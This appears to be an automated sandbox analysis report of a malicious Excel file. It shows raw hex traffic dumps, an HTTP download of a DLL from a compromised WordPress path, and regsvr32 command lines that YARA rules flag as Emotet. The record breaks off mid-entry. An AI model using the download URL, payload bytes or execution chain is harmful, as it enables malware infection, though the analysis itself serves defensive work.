                                                    2022-05-23 07:19:16 UTC315INData Raw: 63 30 35 0d 0a ee a4 b2 21 55 39 e2 6f 4c 28 c5 b4 b3 6f 5e 48 78 c6 bc a6 63 40 24 d4 35 4d 0c d9 6f 4b 0a 80 79 60 99 a5 d4 ac 3a f2 ec ce 8e 95 de 81 0d 7a 67 45 ce 12 49 62 3b f2 c0 9e c8 ca d5 2b 9e 94 98 25 74 32 a9 39 1d da 63 e9 ec 8e 31 6b 6a d5 0d 43 c4 75 52 46 a8 a6 9d 86 96 9f 15 14 13 ea 68 48 19 a6 12 d8 29 76 b1 06 42 67 87 2a 58 2e 37 10 44 e3 26 34 09 71 01 61 ec 72 42 bd 10 13 5e c6 62 55 f1 61 22 b0 2e c4 af 45 39 7d 36 ca 5e 23 79 3a 2d ff 23 37 9c d6 f1 e1 d0 db 66 18 dd 89 89 c0 62 d3 04 1b b4 03 34 8c 43 52 32 d3 00 05 ee 3d 4d a4 06 15 aa 0b 3d 65 b6 40 4b 8c 3d 5b 49 e4 54 0d b3 b4 f2 5d a0 2d 77 c7 74 98 ad 1b 3f d2 04 41 76 e7 05 53 93 e7 69 58 d1 5e 18 aa 47 81 fc ed 1f 26 e5 70 79 84 70 06 9f 4a 84 45 f3 22 0f 97 b3 43 62 b5
                                                    Data Ascii: c05!U9oL(o^Hxc@$5MoKy`:zgEIb;+%t29c1kjCuRFhH)vBg*X.7D&4qarB^bUa".E9}6^#y:-#7fb4CR2=M=e@K=[IT]-wt?AvSiX^G&pypJE"Cb
                                                    2022-05-23 07:19:16 UTC318INData Raw: 31 38 38 31 0d 0a e3 da c9 69 58 50 1b 4b 30 68 c9 af d6 5a 51 6c b7 73 bc ca fa e7 d6 58 45 72 90 99 d2 7c c6 89 65 b7 b5 63 be a0 8c 65 64 6b e6 d0 91 7a 24 55 4b 8f 2e 68 c7 cb 89 6b 6a 5e 22 2a fc 31 b7 c3 f8 24 5f 79 6e d3 dd 93 6f 2a 68 bf cb a7 b0 55 24 b8 32 67 0d f8 ff de 58 45 72 e6 cd d2 63 43 62 e0 e3 9c 6d b6 80 84 65 64 6b 8c 1a 27 73 e3 d0 f9 6b 2b 68 d1 f3 3f 6b 22 d7 0c 18 6d b0 c3 a6 40 24 5f eb d0 fa 3a aa da ea 68 48 2a eb ef fa 06 71 fd ce f5 71 6a 66 1c ce f7 df 78 6a 63 c8 f7 84 76 5f 65 bc b8 f4 65 64 6b 8f ca ed 87 db 14 81 39 3e 60 00 0f b0 93 78 58 46 3c 39 3d 9f 27 bd db a0 76 de 14 74 13 6c f3 e3 8b 62 e7 9e c9 6d 35 76 18 68 b2 22 ed 9c 0d fb 3f 68 22 ea 33 7a 7c ff 27 45 be 7d 34 30 2c e6 cf 8d d8 85 db 1d b8 87 3b 6f 00 4e
                                                    Data Ascii: 1881iXPK0hZQlsXEr|ecedkz$UK.hkj^"*1$_yno*hU$2gXErcCbmedk'sk+h?k"m@$_:hH*qqjfxjcv_eedk9>`xXF<9='vtlbm5vh"?h"3z|'E}40,;oN
                                                    2022-05-23 07:19:17 UTC324INData Raw: 63 39 65 0d 0a 76 d6 e4 67 37 3c 65 ef a8 2f e4 e5 02 26 55 39 34 75 33 5d 8d fd a7 e3 12 6c 34 05 b2 9a 4e 73 e4 98 3d 4d 18 fa bc 66 2a e1 0c 0e 22 12 da 69 9e 04 43 35 39 ef a6 2d 2e b5 23 5c 52 ec d4 44 34 ce d8 04 2f b3 7d dd 6e f0 92 05 aa 36 00 6d ce 8a 00 a2 d1 a7 32 a1 ab b7 4e b5 01 15 4e df fe a4 01 e1 e8 14 74 13 d8 a9 d0 18 ab 12 7e 69 f4 2f c7 13 f2 35 4e 56 02 48 7c 67 f9 1e 47 73 ac b2 ce a9 b4 53 11 0c e4 10 4f 57 f6 fd 19 c9 de 7d 4f 1b e3 44 6a 09 83 14 56 48 3c 05 b8 73 5d 32 24 5f 31 ea 9c 78 63 90 ca 20 c3 ee 2e d3 09 64 7d ff 2b 25 39 e3 16 40 12 3a e4 94 3a 2b c8 d6 10 ee 5f 65 37 7d b7 c9 40 fb 67 65 21 3b af 8c 71 e2 5b 88 48 c7 59 b3 e1 da 6c b4 4d 31 76 ef 04 00 77 f2 ed 7c d0 2b 6f 2a e3 b2 a3 22 7e 71 84 55 eb bc ca 39 e1 63
                                                    Data Ascii: c9evg7<e/&U94u3]l4Ns=Mf*"iC59-.#\RD4/}n6m2NNt~i/5NVH|gGsSOW}ODjVH<s]2$_1xc .d}+%9@::+_e7}@ge!;q[HYlM1vw|+o*"~qU9c
                                                    2022-05-23 07:19:17 UTC328INData Raw: 31 39 61 63 0d 0a 1f 86 31 16 1f 43 f4 1c bd 60 99 28 a5 6f f9 1f b4 10 5b 39 76 d4 20 e0 71 b7 20 bf e0 2a 1a a8 3e 00 75 d1 56 f4 96 ff f6 c6 35 68 5e a1 9f b3 ce 89 2e cb ea b7 a2 a0 a6 af a2 2c 22 d0 8e 4a 6d 5a b8 e2 cb 89 bc f2 34 b5 df cd 2e 72 df df 7a 0b 49 e9 79 a9 a8 84 1c ff ed 8c 67 a1 a6 8c 27 f3 69 8a b8 1e f4 bc 02 40 31 ac 2f 21 0a 12 ea 31 f7 23 3f 3f 6f 86 96 d9 15 54 02 1d 68 48 eb 0b 25 57 ed 40 09 03 8e 7e 6a a1 1d 9e 6a c4 d6 6a 08 06 b9 66 ff 1a be b6 78 e7 95 0c 74 40 e4 54 a1 a9 9a c2 5c ec 2d d7 ba 8b b7 6a 9f 2d eb 4b b0 33 b1 e0 ff 5f 79 e8 2d 87 81 5f 0e 5f c3 6f b1 d1 14 b7 be 33 3c be 34 b5 ed 13 4d 9a ce 5d 6a 63 0b eb 37 3e da a5 38 b1 09 64 64 6b df bf e5 78 24 bc d2 96 d4 97 48 c7 0a ac 2f 21 78 1a e7 31 f7 23 3f 93 39
                                                    Data Ascii: 19ac1C`(o[9v q *>uV5h^.,"JmZ4.rzIyg'i@1/!1#??oThH%W@~jjjfxt@T\-j-K3_y-__o3<4M]jc7>8ddkx$H/!x1#?9
                                                    2022-05-23 07:19:17 UTC334INData Raw: 31 31 30 62 0d 0a fa 2e 42 68 cc 36 43 48 e1 2f 67 5a bf 32 7b 25 04 fd 84 ec ec e3 ef 24 a8 72 e3 11 1d 5b 59 24 3d 4e ba 27 4e 6e bf dd 8c db 70 ef 14 00 6f f8 1d 7c 60 b1 65 cf 4b c9 6e 42 6a ec b0 35 76 c2 41 55 5a 64 66 a5 51 ec 3c 4e 53 ca 26 10 46 d4 29 13 7d b7 61 40 58 af 24 a8 73 e3 11 1d 5b c9 0b 4f 4e 5a 2f 4e 6e 16 b5 09 15 46 e7 34 00 6f 9b 9e 78 4d a0 2b 0e 58 c1 6e 42 6a 19 ef f1 5e 80 bc 25 4e 76 10 c6 9e 3f c2 6e 62 43 62 dc 0c 28 9a c8 f2 78 41 5c e2 de 63 21 49 e4 1d b0 2f 0f 54 89 0a 15 2f ad 1a 6c 54 1f 0d 04 66 c1 60 7b 11 b0 37 50 2b ee 5e 4c 20 6a 4e f7 0f ed 41 52 2b 73 09 b9 38 9f 01 56 57 c6 0f da 43 2e bd 32 7b 45 b6 79 18 55 5f 1e f2 9f a0 0e 00 65 b1 b8 92 92 44 c5 75 4f 5a d5 1c 18 25 d9 22 11 be db e7 78 69 58 50 63 ec ee
                                                    Data Ascii: 110b.Bh6CH/gZ2{%$r[Y$=N'Nnpo|`eKnBj5vAUZdfQ<NS&F)}a@X$s[ONZ/NnF4oxM+XnBj^%Nv?nbCb(xA\c!I/T/lTf`{7P+^L jNAR+s8VWC.2{EyU_eDuOZ%"xiXPc
                                                    2022-05-23 07:19:17 UTC338INData Raw: 31 33 38 32 0d 0a 95 2b c8 1f b4 45 9f a2 72 85 2e f6 67 6b a0 20 95 23 b5 53 39 ac 6e d0 9d 8f 33 6b e3 1b f4 b1 3d 30 cd 23 ee 2f 5f f8 92 1a 8f 2d 6f 25 ec bd 2c 66 5a d0 97 e3 fa 44 35 7e ee 2f 5e 45 72 e6 83 02 90 4a 62 3b f2 8f 61 37 35 bd 9e 81 e2 6c 65 2e fe cf 57 39 6b aa 93 45 e0 3a 6b 65 da da 3e 4d 31 f7 9d 68 03 53 79 66 dc 97 2b 6f 2a e9 b3 50 4c 54 51 63 b0 15 44 35 71 ad 22 7c 35 22 77 44 6a 2b ce 37 a4 3b d4 aa f6 59 18 15 61 2a ec a9 e0 16 00 25 3b ea 5f 4c 70 66 54 6c 6a 99 0c 18 35 22 ac 4e 40 e5 33 5d 11 5d d1 67 4b 52 47 4a 56 e5 9b 3d 48 4d 73 c2 41 55 12 02 e2 56 76 a0 3c 4e 17 d8 04 0b 76 de 11 13 41 68 9f 46 2b e6 11 05 0e fe 97 28 2b ec 2c 24 32 b6 52 43 5e c9 78 69 4d df 45 bf db 34 3d 4d 24 08 a2 2b 0e 14 c9 5e 42 26 c3 5d c6
                                                    Data Ascii: 1382+Er.gk #S9n3k=0#/_-o%,fZD5~/^ErJb;a75le.W9kE:ke>M1hSyf+o*PLTQcD5q"|5"wDj+7;Ya*%;_LpfTlj5"N@3]]gKRGJV=HMsAUVv<NvAhF+(+,$2RC^xiME4=M$+^B&]
                                                    2022-05-23 07:19:17 UTC343INData Raw: 63 33 62 0d 0a 77 43 35 71 22 ef 5f ce 37 50 f1 2d 6b 0f ef a8 52 af 65 37 35 b7 a6 2d e0 3c 75 68 f1 57 4d 70 e0 50 48 49 c5 d2 36 a9 16 cb d0 65 f6 32 42 48 ed 95 77 69 9f 14 0f 63 48 5c 46 2a a1 1e 75 7c 16 b8 48 35 b6 2e 42 4c 10 cf 6a 78 ad 27 67 52 7f df 94 65 7b be fd e4 20 4f 57 50 9c 85 db d4 7d 4f 1b 68 8f 4e 31 ea 1e 7a 78 fb 70 f8 76 ed 04 00 6f f0 2d 7c 60 ec 2b 0e 28 41 de 99 78 96 68 11 8a bf 3c 06 ad 22 7c 7d 1c 17 75 52 a4 07 46 7c 8b a3 fc 5f f2 78 41 54 12 69 f8 21 11 60 71 09 3e a2 2c 24 7e b0 27 4e 6e f0 c4 6a f5 f7 12 64 14 a5 4f 4c ac db 6f 4b 1a e1 0c 0e 56 d1 1d 48 0d fd 07 11 31 59 ae 19 cc 7a a0 3c 4e 53 fa ba a8 76 de 11 13 05 ef 81 44 05 e6 11 05 4a 09 a1 87 05 a0 2c 24 7e b8 2f 4e 6e c3 70 69 79 fd 62 64 17 97 f0 63 9f 14 0f
                                                    Data Ascii: c3bwC5q"_7P-kRe75-<uhWMpPHI6e2BHwicH\F*u|H5.BLjx'gRe{ OWP}OhN1zxpvo-|`+(Axh<"|}uRF|_xATi!`q>,$~'NnjdOLoKVH1Yz<NSvDJ,$~/Nnpiybdc
                                                    2022-05-23 07:19:17 UTC346INData Raw: 63 32 33 0d 0a 7b 45 4f 62 3b f9 18 67 37 35 33 e1 fa 6d 67 65 a0 81 8d b2 3c 6b 24 ec 2b 4c 31 6b eb a5 7d 05 4b 31 79 e2 c9 25 5f 79 e8 a3 61 1f 68 2a 67 cc e2 66 5a 51 ed ce 22 dd 32 71 65 e2 fa 45 72 67 f9 91 10 94 6a 34 79 da 30 31 35 3c a2 21 98 61 7d 80 7a 9c 5c f2 56 a6 25 8b 8b f0 0e 99 55 c9 71 be a7 10 39 15 af 12 8a 9e b9 91 c1 6b a3 3d bb ab 13 a9 80 c7 09 75 84 70 9e 32 39 b5 45 f3 22 97 28 46 bc 9d b5 33 b0 5c 3c ca c3 e4 11 84 f2 65 cc 7a e3 10 ce d1 61 31 00 8f 5c 9c 6f df 3d cb 62 cd 75 66 04 af 12 8a 21 d3 57 a0 3a dd e3 05 c5 2e d3 15 48 15 9e d3 88 8c 95 2a d3 a5 3a 90 a0 71 b8 c2 81 a3 80 5a 65 b6 f6 68 fb 63 6b 23 ee 64 7d 68 de 6c 0c 6f e3 4d 45 d8 77 95 a1 b7 74 ce f6 4e 2f 7b db 44 a2 e8 bb d0 87 94 d5 e9 8b d9 4c 57 51 85 37 89
                                                    Data Ascii: c23{EOb;g753mge<k$+L1k}K1y%_yah*gfZQ"2qeErgj4y015<!a}z\V%Uq9k=up29E"(F3\<eza1\o=buf!W:.H*:qZehck#d}hloMEwtN/{DLWQ7
                                                    2022-05-23 07:19:17 UTC349INData Raw: 32 31 64 32 0d 0a ba 35 67 a3 3a a1 67 16 54 25 79 37 78 6a 62 66 69 34 53 6b 47 37 10 3d 7d 64 71 97 7d c1 6c f4 41 f9 79 5b 79 60 5e 61 6b 6a 5f 52 35 4d 2b 12 46 40 3e 6b 67 69 42 51 31 6f 24 88 44 5a 6d 0a 51 6c 34 62 4b 35 65 0e 68 58 51 26 6a 78 7e 57 4f 62 20 e4 4f 15 36 2c 38 65 7d 6a 28 65 2b 4a 2d 05 38 70 22 68 1b 3a 11 6b 71 3a 57 3c 56 05 68 66 5b 25 43 79 79 08 50 2b 6e 20 6c 48 20 52 52 51 66 67 70 33 34 6a 6c 66 43 44 e3 67 74 1a 68 23 68 04 7f 0f 64 2b 39 3c 79 00 78 67 79 75 68 24 49 0d 7b 2b 74 92 56 c1 7d 8a 4a 98 2e 8d 21 06 67 5f 2c 5f 66 68 fd 50 3b 9f 24 88 44 5a 6d 3a 5b 5c 3c 26 42 21 75 6a 72 6c 4c 72 73 2a 7a 13 42 7b 33 76 46 64 03 35 36 85 6c 1b 60 05 27 4a 21 05 39 6b 2a 7c 04 4e 25 5f 62 5e 5c 6e 5d 41 77 71 46 24 48 1d 60
                                                    Data Ascii: 21d25g:gT%y7xjbfi4SkG7=}dq}lAy[y`^akj_R5M+F@>kgiBQ1o$DZmQl4bK5ehXQ&jx~WOb O6,8e}j(e+J-8p"h:kq:W<Vhf[%CyyP+n lH RRQfgp34jlfCDgth#hd+9<yxgyuh$I{+tV}J.!g_,_fhP;$DZm:[\<&B!ujrlLrs*zB{3vFd56l`'J!9k*|N%_b^\n]AwqF$H`
                                                    2022-05-23 07:19:17 UTC358INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                    1           192.168.2.22  49174        159.203.19.2    443               C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp                kBytes transferred  Direction  Data
                                                    2022-05-23 07:19:25 UTC  358                 OUT        GET /wp-admin/iMc/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: airliftlimo.com
                                                    Connection: Keep-Alive
                                                    2022-05-23 07:19:25 UTC  358                 IN         HTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:21 GMT
                                                    Server: Apache/2
                                                    Set-Cookie: 628b35791d77a=1653290361; expires=Mon, 23-May-2022 07:20:21 GMT; Max-Age=60; path=/
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Last-Modified: Mon, 23 May 2022 07:19:21 GMT
                                                    Expires: Mon, 23 May 2022 07:19:21 GMT
                                                    Content-Disposition: attachment; filename="klJrMZJhgldiJr6j0XWPeZOiGs.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Content-Length: 365056
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
                                                    Data Ascii: :k+{1K<M~}jXP/K*f6rjfd@b4#7gkgnV9k$2kjI0!C$_PkH*K6qje@b445<(kg'U92Oi^HF"`{Q-l*hYQl:ga9(Drg0'gB,e7gkg^uG8k5D1ylH*91#M;z*,!U
                                                    2022-05-23 07:19:25 UTC606INData Raw: 26 4b 9b f9 bd c8 e0 27 3e bf dd 66 fb a7 8f 43 ee 9e 90 6f d1 1d 4b ee 5f 08 93 45 4c 58 da 39 55 fd 0e 6d 98 98 9c a7 ba b5 22 10 d6 78 ae 62 5f 33 37 2a be 70 54 a4 01 03 61 e4 54 12 08 95 d1 21 ec 2d 88 88 17 28 6a 35 0d b4 34 b8 33 ee c1 51 d7 6b 5b e2 4f ec 2a 4a 06 56 4e 66 db 1c 0c 96 9c 98 fb 1a 2f 06 1c cc 37 07 c0 25 8f 87 2c b5 03 3f f0 70 c4 c7 a2 21 33 ee d3 a5 7a e5 38 61 60 a0 25 58 b9 d0 aa 80 5b c1 69 15 b0 03 3e a7 ec 55 79 e2 1d 08 a0 2a 4a e3 0d a2 ed 1f 39 24 be 73 22 ab 70 6a ed d0 e5 72 67 78 82 e1 22 63 34 3e d4 ad 7f be 39 29 fa 6a 67 2d a8 f2 bc 55 39 6b 63 9f d9 55 c7 ea 8c f1 e0 37 4d 70 75 92 a9 ab a9 86 96 9f 15 4b 23 ea 24 48 eb 03 3a 59 ed 40 16 10 57 bb 26 a1 1d 1d 38 68 94 6a e2 06 3a 05 fb 5f 65 b6 40 64 c4 10 8e 67 ee
                                                    Data Ascii: &K'>fCoK_ELX9Um"xb_37*pTaT!-(j543Qk[O*JVNf/7%,?p!3z8a`%X[i>Uy*J9$s"pjrgx"c4>9)jg-U9kcU7MpuK#$H:Y@W&8hj:_e@dg
                                                    2022-05-23 07:19:25 UTC622INData Raw: 2a 55 5c 6a df 0d 9b aa cf 89 99 c1 51 f8 75 bd 6d 50 6f e4 67 cf c3 67 19 b2 62 5f 34 76 fb d5 eb 60 66 b1 63 8d 98 87 ad 26 3c 22 d4 f0 5f a4 52 4a 3f e4 11 14 15 81 1b 7e af 10 46 83 34 98 fe b1 f6 2e 15 d0 21 2b 4d ba 3b 19 08 af 87 c1 d6 64 e6 09 98 cb a9 a2 2e de f9 da 42 8f ff 16 4a b0 07 19 51 c4 37 18 5b a7 63 43 e3 41 09 1b f8 3e 35 fb 20 c3 c1 8f 89 21 f1 69 f2 ce 8a ea 82 03 c7 64 cc eb 2b ef 23 76 23 76 ed 05 83 d4 3c 16 b0 22 3a 6e 2a af 0d 81 50 89 10 6c 71 fd 83 7d f8 16 42 10 ce 3f cc c0 b1 e2 fa 14 c3 97 9e 8f 32 bc 69 ce e5 1e cc c9 59 71 24 92 7c c4 9f 1e 5d 4e b0 2e c5 3d 68 c3 b2 b0 03 c9 3d 81 0a 79 ae 1d e3 e9 1d f6 68 c9 5f d5 0e 8e d5 7a f7 36 86 1d 9b 04 17 82 37 c0 6a 56 18 43 e3 71 d1 d3 61 c8 ca bd 10 c3 2e 33 1f 21 bd 61 2a
                                                    Data Ascii: *U\jQumPoggb_4v`fc&<"_RJ?~F4.!+M;d.BJQ7[cCA>5 !id+#v#v<":n*Plq}B?2iYq$|]N.=h=yh_z67jVCqa.3!a*
                                                    2022-05-23 07:19:25 UTC638INData Raw: 5e c8 3b 8a 74 9e 8a 95 e3 5f b8 04 b0 5e aa 1a c2 77 4b 2a 66 9d 14 88 fa d3 87 35 b0 07 82 5c c4 37 83 02 da 63 43 e3 41 92 86 fb 3d 35 fb 20 84 32 24 f2 21 bb 41 b5 3b aa 46 88 0f 8f 54 8b 66 df 3d dc 2c 39 37 66 87 61 af 1f 2d eb 50 aa 22 da 00 ad 96 c9 db 24 9c 68 92 f7 9a b6 2f 8a b9 64 9e 67 13 2f 8f 08 eb 71 9a e7 be 7c 5d 13 e4 11 87 fc 9b 08 3f e3 10 11 c7 4e 94 00 c5 7c 43 9d bf 63 f6 9c d8 75 ac 81 cd 59 f0 24 70 d1 6e 47 9e 40 48 2a e7 1f 79 39 a2 89 bc b4 04 42 07 78 41 72 23 f3 2f 43 c8 27 dc ff 1b 41 77 be 79 4d ed 2f 43 5d 69 f7 21 21 0b 6b 2b 20 89 0a 15 5b e1 1b a4 78 c6 7c 86 ed 15 c4 d4 34 8d d1 14 0f 47 c2 89 24 d5 99 12 d8 2f 6d 3e c6 f5 7e ef cb 58 45 72 df e3 40 6e 43 5f c4 16 55 65 38 b1 a1 65 64 6b 8e d8 dd 85 db 92 7c 8b 6c ff
                                                    Data Ascii: ^;t_^wK*f5\7cCA=5 2$!A;FTf=,97fa-P"$h/dg/q|]?N|CcuY$pnG@H*y9BxAr#/C'AwyM/C]i!!k+ [x|4G$/m>~XEr@nC_Ue8edk|l
                                                    2022-05-23 07:19:25 UTC654INData Raw: 81 75 66 40 c1 8c db 69 d3 d5 9b 6c 2a 68 89 ca 65 d3 d4 dc 36 76 43 f4 dc da 65 58 45 62 e6 cd da 60 43 62 ec 7f 56 65 bc b0 8c 66 64 6b ec e0 99 79 24 55 d1 2b fb 97 ff 89 b4 ab 69 5e 48 e9 97 9e 76 2e cb fc e7 36 85 9c 1e a0 e2 ea 6b 48 2a 91 bb 90 86 36 ff d6 f5 72 6a 66 99 e8 b2 64 78 6a 67 c2 d7 f4 75 5f 65 a6 6c 69 51 e5 de a7 66 21 7a 51 2d 61 5f ec ed c8 4d 31 6b 42 5f 45 3c cc 84 be 65 40 24 63 2d 10 d3 d1 ae a7 29 68 48 dd f1 5a 51 ed 80 be 40 35 71 67 30 26 ce b5 e2 c0 69 63 43 b7 f0 74 5f a4 92 8d 3f 65 64 63 0c e0 99 79 24 55 27 e2 ae d0 03 4e 31 d3 55 9b 6d 7f c6 bc ce 65 40 24 a8 98 21 d5 1c 0f 1f 62 e1 04 0e 2e 9b bb 68 7d fd 88 bc e4 d2 65 58 45 f3 d2 c0 69 63 43 25 7e 29 5e a2 73 11 6c 89 52 42 67 a4 4d 5e 74 5c b8 1f 0f 38 3b ce 37 6b
                                                    Data Ascii: uf@il*he6vCeXEb`CbVefdky$U+i^Hv.6kH*6rjfdxjgu_eliQf!zQ-a_M1kB_E<e@$c-)hHZQ@5qg0&icCt_?edcy$U'N1Ume@$!b.h}eXEicC%~)^slRBgM^t\8;7k
                                                    2022-05-23 07:19:25 UTC670INData Raw: af 13 5d 49 af b1 fa 85 a3 3c 6c 0a e7 16 75 4c 80 05 f8 03 f0 1e 42 78 a5 3f d6 4e e1 27 67 42 bd 32 7b 45 7f b6 f8 7d a7 23 ec a1 69 f3 7c 5d 71 e2 43 78 48 c7 41 73 3d 16 cb d0 2d 79 f5 06 a0 24 d4 cd 4d e8 50 2b 6f 62 e3 e4 0e f6 5a 51 6c bc 06 9b be f5 4e ce 58 45 72 2e f3 b3 ea 07 46 0c fd db 41 97 35 3c 65 2c e0 9e ec 65 5e 14 de bd 4f b3 68 00 4e b8 2f 4e 76 00 b5 21 15 56 8e ac e8 a0 86 5a 98 97 6f 4b 72 1b 58 2b 66 d3 15 48 69 3e c8 30 56 cb 66 58 0d f7 a7 0d 11 a4 07 46 64 e6 a1 48 37 74 84 da 34 76 80 a4 4d 5e 74 5c b8 1f 0f 38 9e 43 33 6b ad da 6c 84 4d 31 76 17 58 fd 5f f2 ed 7c e8 2b 6f 2a e5 44 6a a7 bb 53 e5 b9 52 fb 35 71 6a df e6 c5 2c ff 13 ee 47 fb 62 34 76 73 ec b3 11 84 65 64 6b e6 e1 05 c2 24 55 39 1c e8 97 ff cf 85 4f d2 5e 48 3c
                                                    Data Ascii: ]I<luLBx?N'gB2{E}#i|]qCxHAs=-y$MP+obZQlNXEr.FA5<e,e^OhN/Nv!VZoKrX+fHi>0VfXFdH7t4vM^t\8C3klM1vX_|+o*DjSR5qj,Gb4vsedk$U9O^H<
                                                    2022-05-23 07:19:26 UTC686INData Raw: 52 50 2b ee 9f 20 42 2a 66 8a d2 29 35 fd c6 7d 7b 6a 66 b0 58 74 98 87 22 e8 fe 2a 3e 76 5f 2d bc c5 79 56 a4 ea 9c 1f 7d 71 24 5a b6 b2 2c 68 00 41 b5 b0 6c 5e 48 bd b6 0e a7 66 40 2b db 5b 6c 58 50 aa 94 56 84 49 2a 69 de 6f 6e 35 76 c2 ce fc c7 65 58 4a f6 ad 79 6a 63 c2 99 3a 2a 5a 65 38 b1 77 64 64 6b e6 9e 63 a6 2c 55 36 ee 08 66 00 4e f6 2f 4e 2e eb d4 02 31 ce ab 8c e8 93 be 2d 7c 10 2a 6f 2a 68 c9 66 42 2a 43 ee a8 7e 0f bc 35 4e 5e d9 01 56 17 a9 d2 63 43 e3 40 52 2f e1 94 d5 34 a2 e1 3b 6d 65 21 f8 cd 1a 39 ea 9e 38 0a 4e 31 cd b5 81 e3 b7 c0 61 7c 66 40 d3 be b8 83 5a d9 be 3f 20 68 48 eb cb 0a 5b 6c 35 78 c2 80 21 60 66 58 a3 c4 65 78 ad 27 67 16 70 36 39 65 b6 71 18 11 49 7a 67 65 a0 0e 00 21 63 33 45 68 c7 cb 79 61 6a 5e 8c d4 a1 31 1d e3
                                                    Data Ascii: RP+ B*f)5}{jfXt"*>v_-yV}q$Z,hAl^Hf@+[lXPVI*ion5veXJyjc:*Ze8wddkc,U6fN/N.1-|*o*hfB*C~5N^VcC@R/4;me!98N1a|f@Z? hH[l5x!`fXex'gp69eqIzge!c3Ehyaj^1
                                                    2022-05-23 07:19:26 UTC702INData Raw: 5f 17 6d 4b f9 17 da 29 4a ff 07 11 59 e1 23 97 01 f9 2a b3 e1 35 03 e9 79 b1 d6 21 13 15 d4 f7 6c 95 98 dd 1f 0b 29 55 d0 67 d5 97 ff 89 74 a0 8b ca 70 3c 05 bc 20 7e 0c a9 12 9e e8 1d 9b ef de d5 97 c9 67 ad d9 0d d4 50 f7 36 fe 36 5b d3 3d 82 37 a0 db b4 c8 43 a3 51 b1 5a 0e 72 f2 4e ec 21 ac e6 10 e6 9b 06 7d a8 ac 6e 17 bf 7d 1f 6b eb 1b 37 60 fd 31 76 a7 2d 5b 56 f8 2c 27 ba 12 6f 2a e9 3d 55 01 f9 52 6c be 33 3c 71 fa 2f a1 d3 08 b9 ee 3c 4e 43 ab e2 ae 88 a0 dd 37 10 39 65 8d f9 9a 9a de bd 61 92 f6 f7 eb 68 b8 51 43 32 5b 12 c5 79 aa ba 3b a1 b7 c5 9e 93 6d d1 05 ec ee 5f af b3 b8 68 5a 96 29 fe ea ce 36 71 eb 23 93 78 ee 67 78 eb 2e 88 63 cb b2 47 e4 72 fe 8f b2 64 6b e6 10 ea 3d 82 92 21 ac 6e a7 74 a9 82 6b eb 13 87 a0 37 29 da e7 35 eb a5 c6
                                                    Data Ascii: _mK)JY#*5y!l)Ugtp< ~gP66[=7CQZrN!}n}k7`1v-[V,'o*=URl3<q/<NC79eahQC2[y;m_hZ)6q#xgx.cGrdk=!ntk7)5



                                                    Target ID:0
                                                    Start time:09:18:18
                                                    Start date:23/05/2022
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13fce0000
                                                    File size:28253536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:3
                                                    Start time:09:18:29
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:4
                                                    Start time:09:18:31
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:5
                                                    Start time:09:18:33
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:6
